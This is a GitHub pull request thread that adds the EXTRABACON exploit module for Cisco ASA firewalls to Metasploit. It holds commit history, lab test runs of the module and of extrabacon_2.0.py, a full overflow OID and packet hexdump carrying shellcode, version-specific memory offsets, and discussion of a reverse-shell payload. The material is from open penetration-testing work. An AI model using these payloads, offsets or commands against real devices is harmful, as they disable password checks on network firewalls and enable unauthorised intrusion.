Skip to content

Added module auxiliary/admin/cisco/cisco_asa_extrabacon #7359

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
bcook-r7 merged 43 commits into from
Sep 24, 2016
Merged

Added module auxiliary/admin/cisco/cisco_asa_extrabacon #7359

bcook-r7 merged 43 commits into from
Sep 24, 2016

Conversation

@ghost
Copy link

@ghost ghost commented Sep 24, 2016
edited by ghost
Loading

This includes @bcook-r7 pull request for module documentation and credit to @wwebb-r7

Also is a new feature branch as requested.

Closed PR #7353

zerosum0x0 and others added 30 commits September 22, 2016 18:06
Added module auxiliary/admin/cisco/cisco_asa_extrabacon
3c7fc49 
This module patches the authentication functions of a Cisco ASA
to allow uncredentialed logins. Uses improved shellcode for payload.
Replaced global vars, made 'patched_code' value static
c180451
added always_return_true variable
4288c3f
Added offsets for 8.4(3)
022189c
@jennamagius
Fix whitespace per msftidy
a0ba8b7
Added offsets for 8.2(3)
e8d1f6d
Added offsets for 9.2(2)8
c22a2a1
Removing redundant version check
b77adc9
Fixed problem with 9.2(2)8 offsets
5ca6563
Added offsets for 9.0(1)
4e9459d
Adding offsets for 9.1(1)4
961524d
Added RiskSense contributor repo to references
064aed8
Added offsets for 8.3(1)
7762f42
stupid comment
28a09c2
Added offsets for 8.4(7)
f525c24
Merge branch 'master' of github.com:RiskSense-Ops/metasploit-framework
48f024d
Replaced '+=' with '<<'
df25f07
Moved required datastore option into constructor
cf07085
Added basic error handling for unsupported ASA versions
dda6b67
numerous fixes as per @busterb
2591d0b
fix merge conflicts
1868371
Changed 'build_offsets' to 'build_payload'
98cf5d8
added all leaked versions
480e973
Merge branch 'master' of github.com:RiskSense-Ops/metasploit-framework
455936e
offset for 8.0(3)6
6c5271c
Adding new version offsets
f19ed43
Merge branch 'master' of github.com:RiskSense-Ops/metasploit-framework
9cbd84d
Added offsets for version 8.2(5)33
d36e16f
Added offsets for version 9.2(1)
b4d3e8e
Added offsets for version 8.2(5)41
926e5fa
@ghost ghost mentioned this pull request Sep 24, 2016
Closed
9 tasks
@bcook-r7 bcook-r7 self-assigned this Sep 24, 2016
bcook-r7 pushed a commit to busterb/metasploit-framework that referenced this pull request Sep 24, 2016
Land rapid7#7359, add EXTRABACON auxiliary module auxiliary/admin/cis…
a4974ce 
…co/cisco_asa_extrabacon
@bcook-r7
Copy link
Contributor

bcook-r7 commented Sep 24, 2016

Thanks!

@bcook-r7 bcook-r7 merged commit 90bd2a9 into rapid7:master Sep 24, 2016
bcook-r7 pushed a commit that referenced this pull request Sep 24, 2016
Land #7359, add EXTRABACON auxiliary module auxiliary/admin/cisco/cis…
e0ff885 
…co_asa_extrabacon
@ghost ghost deleted the extrabacon branch September 24, 2016 16:39
@nixawk
Copy link
Contributor

nixawk commented Sep 26, 2016

@zerosum0x0 @bcook-r7 I've tested the module against my vuln-device, but no good luck.

msf auxiliary(cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.206.114  yes       The target address
   RPORT      161              yes       The target port
   TIMEOUT    1                yes       SNMP Timeout

msf auxiliary(cisco_asa_extrabacon) > run

[*] Building pass-disable payload for version 9.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed

$ telnet 192.168.206.114
Trying 192.168.206.114...
Connected to 192.168.206.114.
Escape character is '^]'.


User Access Verification

Password:
Password:
Password: Connection closed by foreign host.

@nixawk
Copy link
Contributor

nixawk commented Sep 26, 2016

RiskSense-Ops/CVE-2016-6366 also fails to exploit the vuln-device.

sec@gpg:~/Downloads/CVE-2016-6366/extrabacon-2.0$ python extrabacon_2.0.py info -t 192.168.206.114 -c public 
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/sec/Downloads/CVE-2016-6366/extrabacon-2.0/concernedparent
[+] Executing:  extrabacon_2.0.py info -t 192.168.206.114 -c public
[+] probing target via snmp
[+] Connecting to 192.168.206.114:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['public']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 9.2(1)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[23500L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['ciscoasa']>

[+] firewall uptime is 23500 time ticks, or 0:03:55

[+] firewall name is ciscoasa

[+] target is running 9_2(1), which is supported
Data stored in key file  : 9_2(1)
Data stored in self.vinfo: 9_2(1)

To check the key file to see if it really contains what we're claiming:
# cat /home/sec/Downloads/CVE-2016-6366/extrabacon-2.0/keys/ee5t3g.key

To disable password checking on target:
# extrabacon_2.0.py exec -k ee5t3g -t 192.168.206.114 -c public --mode pass-disable

To enable password checking on target:
# extrabacon_2.0.py exec -k ee5t3g -t 192.168.206.114 -c public --mode pass-enable

sec@gpg:~/Downloads/CVE-2016-6366/extrabacon-2.0$ cat /home/sec/Downloads/CVE-2016-6366/extrabacon-2.0/keys/ee5t3g.key
9_2(1)

sec@gpg:~/Downloads/CVE-2016-6366/extrabacon-2.0$ python extrabacon_2.0.py exec -k ee5t3g -t 192.168.206.114 -c public --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/sec/Downloads/CVE-2016-6366/extrabacon-2.0/concernedparent
[+] Executing:  extrabacon_2.0.py exec -k ee5t3g -t 192.168.206.114 -c public --mode pass-disable
Data stored in self.vinfo: 9_2(1)
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./improved
[+] importing version-specific shellcode shellcode_9_2(1)
[+] random SNMP request-id 476275327
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.49.219.49.246.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187.0.240.182.9.205.128.88.187.0.80.8.8.205.128.199.5.16.252.182.9.49.192.64.195.199.5.176.84.8.8.49.192.64.195.97.104.54.118.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195.144.144.144.144.144.144.144.197.180.10.8.139.124.36.20.139.7.255.224.144
EXBA msg (200): 3081c502010104067075626c6963a581b702041c63627f0201000201013081a83081a50681a02b060104010909836b010303010105095f31815b3181763181493181406031815281008145108100814207047d50813b008170813609814d810058813b00500808814d810081470510817c81360931814040814381470581305408083181404081436168367627098100814310813f0b0f0f0f81098165810381454881438110811081108110811081108110814581340a08810b7c2414810b07817f816081100500
[+] Connecting to 192.168.206.114:161
[+] packet 1 of 1
[+] 0000   30 81 C5 02 01 01 04 06  70 75 62 6C 69 63 A5 81   0.......public..
[+] 0010   B7 02 04 1C 63 62 7F 02  01 00 02 01 01 30 81 A8   ....cb.......0..
[+] 0020   30 81 A5 06 81 A0 2B 06  01 04 01 09 09 83 6B 01   0.....+.......k.
[+] 0030   03 03 01 01 05 09 5F 31  81 5B 31 81 76 31 81 49   ......_1.[1.v1.I
[+] 0040   31 81 40 60 31 81 52 81  00 81 45 10 81 00 81 42   1.@`1.R...E....B
[+] 0050   07 04 7D 50 81 3B 00 81  70 81 36 09 81 4D 81 00   ..}P.;..p.6..M..
[+] 0060   58 81 3B 00 50 08 08 81  4D 81 00 81 47 05 10 81   X.;.P...M...G...
[+] 0070   7C 81 36 09 31 81 40 40  81 43 81 47 05 81 30 54   |.6.1.@@.C.G..0T
[+] 0080   08 08 31 81 40 40 81 43  61 68 36 76 27 09 81 00   ..1.@@.Cah6v'...
[+] 0090   81 43 10 81 3F 0B 0F 0F  0F 81 09 81 65 81 03 81   .C..?.......e...
[+] 00a0   45 48 81 43 81 10 81 10  81 10 81 10 81 10 81 10   EH.C............
[+] 00b0   81 10 81 45 81 34 0A 08  81 0B 7C 24 14 81 0B 07   ...E.4....|$....
[+] 00c0   81 7F 81 60 81 10 05 00                            ...`....
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['public']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[476275327L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.9.9.720.1.1.1.0']>
   |   |  value     = <ASN1_INTEGER[2L]>
[+] received SNMP id 476275327, matches random id sent, likely success
[+] clean return detected


sec@gpg:~/Downloads/CVE-2016-6366/extrabacon-2.0$ telnet 192.168.206.114
Trying 192.168.206.114...
Connected to 192.168.206.114.
Escape character is '^]'.


User Access Verification

Password: 
Password: 
Password: Connection closed by foreign host.

@nixawk
Copy link
Contributor

nixawk commented Sep 26, 2016
edited
Loading 

msf auxiliary(snmp_login) > run

[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Please check my pcap - cisco_asa-CVE-2016-6366.zip

@ghost
Copy link
Author

ghost commented Sep 26, 2016
edited by ghost
Loading

@nixawk we tested it against SSH on 9.2(1) and verified it worked originally. I will reload that version in about 1 hour and re-test. We have never tested against telnet, but from my understanding it uses the same authentication functions that the shellcode patches. It isn't crashing the ASA, which means the shellcode should actually be doing something and the offsets are correct.

Going forward I may experiment with reverse TCP shelling it directly with the shellcode. I've read it's not a straightforward payload for ASA devices but it seems to have standard Linux syscalls? We have 82 bytes to play with, which should be plenty. If we need more it will have to calculate offset to the third stage, use an egg hunter, or perhaps just overflow a couple more stack frames and do extra cleanup. Problem with calculating to third stage is even Equation Group code seems unstable. Worked for me on 8.4(3) but not 8.2(3).

@ghost
Copy link
Author

ghost commented Sep 26, 2016
edited by ghost
Loading

@nixawk we tested and confirmed both the Metasploit module and ExtraBacon 2.0 Python code worked on 9.2(1) for both SSH and Telnet.

Can you extract the lina file and run lina-offsets.py on it and see if the offsets match?

https://software.cisco.com/download/release.html?mdfid=280582808&softwareid=280775065&release=9.2.1.ED&relind=AVAILABLE&rellifecycle=&reltype=latest

9.2.1.ED

zerosum0x0@localhost ~/Downloads> sha256sum asa921-k8.bin
07d9fd8f32dab7c663649f0932cc058fb3bdc5771c134324183d1eeeaaae8ef0  asa921-k8.bin

binwalk -e asa921-k8.bin

cd _asa921-k8.bin.extracted/; cpio -idv < rootfs.img

zerosum0x0@localhost ~/D/_asa921-k8.bin.extracted> ~/CVE-2016-6366/lina-offsets.py asa/bin/lina
{u'after': 2, u'name': u'ADMAUTH', u'oneshot': False, 'found': [{'operation': 'push   ebp', 'bytes': '55', 'address': '80854b0'}, {'operation': 'mov    ebp,esp', 'bytes': '89 e5', 'address': '80854b1'}, {'operation': 'push   edi', 'bytes': '57', 'address': '80854b3'}], u'type': u'BEFORE', u'find': [u'c7 45 f0 01 00 00 00', u'66 c7 45 ?? c1 10'], u'match': u'55', u'before': 0}
{u'after': 0, u'name': u'JMPESP', u'oneshot': True, 'found': [{'operation': 'jmp    80a99c8 <XML_SetCommentHandler@plt+0x5aff0>', 'bytes': 'e9 ff e4 ff ff', 'address': '80ab4c4'}], u'type': u'EXACT', u'find': [u'ff e4'], u'match': u'ff e4', u'before': 0}
{u'after': 0, u'name': u'VULNFUNC', u'oneshot': False, 'found': [{'operation': 'push   ebp', 'bytes': '55', 'address': '9276440'}], u'type': u'BEFORE', u'find': [u'89 e5', u'57', u'56', u'53', u'83 ec 6c', u'a1 ?? ?? ?? ??', u'8b 5d 1c', u'85 c0', u'0f 84 ?? ?? ?? ??', u'8b 03'], u'match': u'55', u'before': 0}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   9276440 <svcerr_weakauth@@Base+0x17d5a0>', 'bytes': 'e8 0a ee ff ff', 'address': '9277631'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '9277636'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   92763d0 <svcerr_weakauth@@Base+0x17d530>', 'bytes': 'e8 d1 e1 ff ff', 'address': '92781fa'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '92781ff'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   92763c0 <svcerr_weakauth@@Base+0x17d520>', 'bytes': 'e8 e1 dd ff ff', 'address': '92785da'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '92785df'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   927a570 <svcerr_weakauth@@Base+0x1816d0>', 'bytes': 'e8 6b b1 ff ff', 'address': '927f400'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '927f405'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   9299b60 <svcerr_weakauth@@Base+0x1a0cc0>', 'bytes': 'e8 29 ef ff ff', 'address': '929ac32'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '929ac37'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   929a1c0 <svcerr_weakauth@@Base+0x1a1320>', 'bytes': 'e8 54 f1 ff ff', 'address': '929b067'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '929b06c'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 2, u'name': u'PMCHECK', u'oneshot': False, 'found': [{'operation': 'push   ebp', 'bytes': '55', 'address': '9b6fc10'}, {'operation': 'xor    eax,eax', 'bytes': '31 c0', 'address': '9b6fc11'}, {'operation': 'mov    ebp,esp', 'bytes': '89 e5', 'address': '9b6fc13'}], u'type': u'BEFORE', u'find': [u'8b 75 08', u'89 7d fc', u'8b 16', u'85 d2'], u'match': u'55', u'before': 0}
saferet_offset  = "54.118.39.9"     # 0x09277636
jmp_esp_offset  = "197.180.10.8"        # 0x080ab4c5
admauth_offset  = "176.84.8.8"      # 0x080854b0
admauth_bounds  = "0.80.8.8"        # 0x08085000
admauth_code    = "85.137.229.87"       # 0x5589e557
pmcheck_offset  = "16.252.182.9"        # 0x09b6fc10
pmcheck_bounds  = "0.240.182.9"     # 0x09b6f000
pmcheck_code    = "85.49.192.137"       # 0x5531c089
fix_ebp = "72"      # 0x48
#"VERS" => ["197.180.10.8", "54.118.39.9", "72", "0.240.182.9", "16.252.182.9", "85.49.192.137", "0.80.8.8", "176.84.8.8", "85.137.229.87"]

@tdoan-r7
Copy link
Contributor

tdoan-r7 commented Sep 26, 2016

@bcook-r7 please write release notes!

@bcook-r7
Copy link
Contributor

bcook-r7 commented Sep 26, 2016

Release Notes

This module implements the EXTRABACON exploit for Cisco ASA VPN appliances. The exploit works by disabling authentication remotely via a specially-crafted SNMP packet. This was originally part of the Equation Group disclosure made by Shadow Brokers. It supports a variety of firmware versions from 8.x to 9.x.

@tdoan-r7 tdoan-r7 added rn-enhancement release notes enhancement module feature labels Oct 4, 2016
@wvu wvu mentioned this pull request Nov 26, 2016
Merged
8 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@bcook-r7 bcook-r7

Labels

feature module rn-enhancement release notes enhancement

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@bcook-r7 @nixawk @tdoan-r7 @jennamagius